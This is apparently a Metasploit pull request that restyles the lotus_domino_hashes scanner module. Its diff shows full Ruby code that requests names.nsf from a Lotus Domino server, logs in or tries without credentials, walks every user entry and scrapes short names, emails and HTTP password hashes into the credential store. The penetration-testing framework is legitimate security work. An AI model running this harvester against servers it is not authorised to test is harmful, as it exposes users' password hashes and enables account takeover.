### PR TITLE
Update style lotus_domino_hashes

### DIFF
--- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
+++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
@@ -4,7 +4,6 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
@@ -21,61 +20,56 @@ class MetasploitModule < Msf::Auxiliary
     [
       OptString.new('NOTES_USER', [false, 'The username to authenticate as', '']),
       OptString.new('NOTES_PASS', [false, 'The password for the specified username' ]),
-      OptString.new('URI', [false, 'Define the path to the names.nsf file', '/names.nsf']),
+      OptString.new('URI', [false, 'Define the path to the names.nsf file', '/names.nsf'])
     ])
-
   end
 
   def run_host(ip)
+    user = datastore['NOTES_USER']
+    pass = datastore['NOTES_PASS']
+    @uri = normalize_uri(datastore['URI'])
 
-    user = datastore['NOTES_USER'].to_s
-    pass = datastore['NOTES_PASS'].to_s
-    $uri = normalize_uri(datastore['URI'])
-
-    if (user.length == 0 and pass.length == 0)
-      print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashes without credentials")
+    if user.eql?('') && pass.eql?('')
+      print_status("#{peer} - Lotus Domino - Trying dump password hashes without credentials")
 
       begin
         res = send_request_raw({
           'method'  => 'GET',
-          'uri'     => "#{$uri}\/$defaultview?Readviewentries",
+          'uri'     => "#{@uri}\/$defaultview?Readviewentries",
         }, 25)
 
         if res.nil?
-          print_error("Connection timed out")
+          print_error('Connection failed')
           return
         end
 
-        if (res and res.body.to_s =~ /\<viewentries/)
-          print_good("http://#{vhost}:#{rport} - Lotus Domino - OK names.nsf accessible without credentials")
+        if res && res.body.to_s =~ /\<viewentries/
+          print_good("#{peer} - Lotus Domino - OK names.nsf accessible without credentials")
           cookie = ''
-          get_views(cookie,$uri)
+          get_views(cookie, @uri)
 
-        elsif (res and res.body.to_s =~ /names.nsf\?Login/)
-          print_error("http://#{vhost}:#{rport} - Lotus Domino - The remote server requires authentication")
+        elsif res && res.body.to_s =~ /names.nsf\?Login/
+          print_error("#{peer} - Lotus Domino - The remote server requires authentication")
           return :abort
 
         else
-          print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response")
-          print_error(res.to_s)
+          print_error("#{peer} - Lotus Domino - Unrecognized #{res.code} response")
+          vprint_error(res.to_s)
           return :abort
 
         end
 
-        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-        rescue ::Timeout::Error, ::Errno::EPIPE
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      rescue ::Timeout::Error, ::Errno::EPIPE
       end
 
     else
-      print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashes with given credentials")
+      print_status("#{peer} - Lotus Domino - Trying dump password hashes with given credentials")
       do_login(user, pass)
-
     end
-
   end
 
-
-  def do_login(user=nil,pass=nil)
+  def do_login(user = nil, pass = nil)
     post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"
 
     begin
@@ -83,122 +77,111 @@ class MetasploitModule < Msf::Auxiliary
       res = send_request_cgi({
         'method'  => 'POST',
         'uri'     => '/names.nsf?Login',
-        'data'    => post_data,
+        'data'    => post_data
       }, 20)
 
       if res.nil?
-        print_error("http://#{vhost}:#{rport} - Connection timed out")
+        print_error("#{peer} - Connection timed out")
         return
       end
 
-      if res and res.code == 302
-        if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)
+      if res && res.code == 302
+        if res.get_cookies =~ /DomAuthSessId=(.*);(.*)/i
           cookie = "DomAuthSessId=#{$1}"
-        elsif res.get_cookies.match(/LtpaToken=(.*);(.*)/i)
+        elsif res.get_cookies =~ /LtpaToken=(.*);(.*)/i
           cookie = "LtpaToken=#{$1}"
         else
-          print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")
+          print_error("#{peer} - Lotus Domino - Unrecognized 302 response")
           return :abort
         end
-        print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL authentication for '#{user}'")
-        print_status("http://#{vhost}:#{rport} - Lotus Domino - Getting password hashes")
-        get_views(cookie,$uri)
+        print_good("#{peer} - Lotus Domino - SUCCESSFUL authentication for '#{user}'")
+        print_status("#{peer} - Lotus Domino - Getting password hashes")
+        get_views(cookie, @uri)
 
-      elsif (res and res.body.to_s =~ /names.nsf\?Login/)
-          print_error("http://#{vhost}:#{rport} - Lotus Domino - Authentication error: failed to login as '#{user}'")
-          return :abort
+      elsif res && res.body.to_s =~ /names.nsf\?Login/
+        print_error("#{peer} - Lotus Domino - Authentication error: failed to login as '#{user}'")
+        return :abort
 
       else
-        print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response")
+        print_error("#{peer} - Lotus Domino - Unrecognized #{res.code} response")
         return :abort
       end
 
-      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      rescue ::Timeout::Error, ::Errno::EPIPE
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+    rescue ::Timeout::Error, ::Errno::EPIPE
     end
-
   end
 
-  def get_views(cookie,uri)
-
+  def get_views(cookie, uri)
     begin
       res = send_request_raw({
         'method'  => 'GET',
         'uri'     => "#{uri}\/$defaultview?Readviewentries",
-        'cookie'  => cookie,
+        'cookie'  => cookie
       }, 25)
-      if (res and res.body)
-        max = res.body.scan(/siblings=\"(.*)\"/)[0].join
+      if res && res.body
+        max = res.body.scan(/siblings=\"(.*)\"/).first.join
 
-        1.upto(max.to_i) {|i|
+        1.upto(max.to_i) do |i|
           res = send_request_raw({
             'method'  => 'GET',
             'uri'     => "#{uri}\/$defaultview?Readviewentries&Start=#{i}",
-            'cookie'  => cookie,
+            'cookie'  => cookie
           }, 25)
 
-        viewId = res.body.scan(/unid="([^\s]+)"/)[0].join
-        dump_hashes(viewId,cookie,uri)
-        }
+          view_id = res.body.scan(/unid="([^\s]+)"/)[0].join
+          dump_hashes(view_id, cookie, uri)
+        end
 
       end
 
-      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      rescue ::Timeout::Error, ::Errno::EPIPE
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+    rescue ::Timeout::Error, ::Errno::EPIPE
     end
   end
 
-  def dump_hashes(view_id,cookie,uri)
-
+  def dump_hashes(view_id, cookie, uri)
     begin
       res = send_request_raw({
         'method'  => 'GET',
         'uri'     => "#{uri}\/$defaultview/#{view_id}?OpenDocument",
-        'cookie'  => cookie,
+        'cookie'  => cookie
       }, 25)
 
-      if (res and res.body)
+      if res && res.body
         short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
         user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
         pass_hash = res.body.scan(/<INPUT NAME=\"\$?dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
 
-        if short_name.to_s.strip.empty?
-          short_name = 'NULL'
-        end
+        short_name = 'NULL' if short_name.to_s.strip.empty?
+        user_mail = 'NULL' if user_mail.to_s.strip.empty?
+        pass_hash = 'NULL' if pass_hash.to_s.strip.empty?
 
-        if user_mail.to_s.strip.empty?
-          user_mail = 'NULL'
-        end
-
-        if pass_hash.to_s.strip.empty?
-          pass_hash = 'NULL'
-        end
-
-        print_good("http://#{vhost}:#{rport} - Lotus Domino - Account Found: #{short_name}, #{user_mail}, #{pass_hash}")
+        print_good("#{peer} - Lotus Domino - Account Found: #{short_name}, #{user_mail}, #{pass_hash}")
 
         if pass_hash != 'NULL'
           domino_svc = report_service(
             :host => rhost,
             :port => rport,
-            :name => "http"
+            :name => (ssl ? 'https' : 'http')
           )
           report_auth_info(
             :host        => rhost,
             :port        => rport,
-            :sname       => (ssl ? "https" : "http"),
+            :sname       => (ssl ? 'https' : 'http'),
             :user        => short_name,
             :pass        => pass_hash,
-            :ptype       => "domino_hash",
-            :source_id => domino_svc.id,
-            :source_type => "service",
+            :ptype       => 'domino_hash',
+            :source_id   => domino_svc.id,
+            :source_type => 'service',
             :proof       => "WEBAPP=\"Lotus Domino\", USER_MAIL=#{user_mail}, HASH=#{pass_hash}, VHOST=#{vhost}",
             :active      => true
           )
         end
       end
 
-      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      rescue ::Timeout::Error, ::Errno::EPIPE
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+    rescue ::Timeout::Error, ::Errno::EPIPE
     end
   end
 end


### PR DESCRIPTION
This PR updates the [lotus_domino_hashes](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb) module for Ruby and Metasploit coding styles.

Primarily:
* Indentation
* Removing redundant commas
* Removing redundant whitespace
* Replacing `and` in conditionals with `&&`
* Removing redundant `to_s` when accessing `datastore` objects of type String
* Replacing `print_error` with `vprint_error` for debugging information
* Add whitespace between parameters in method definitions and calls
* Replacing `http://#{vhost}:#{rport}` with `#{peer}`

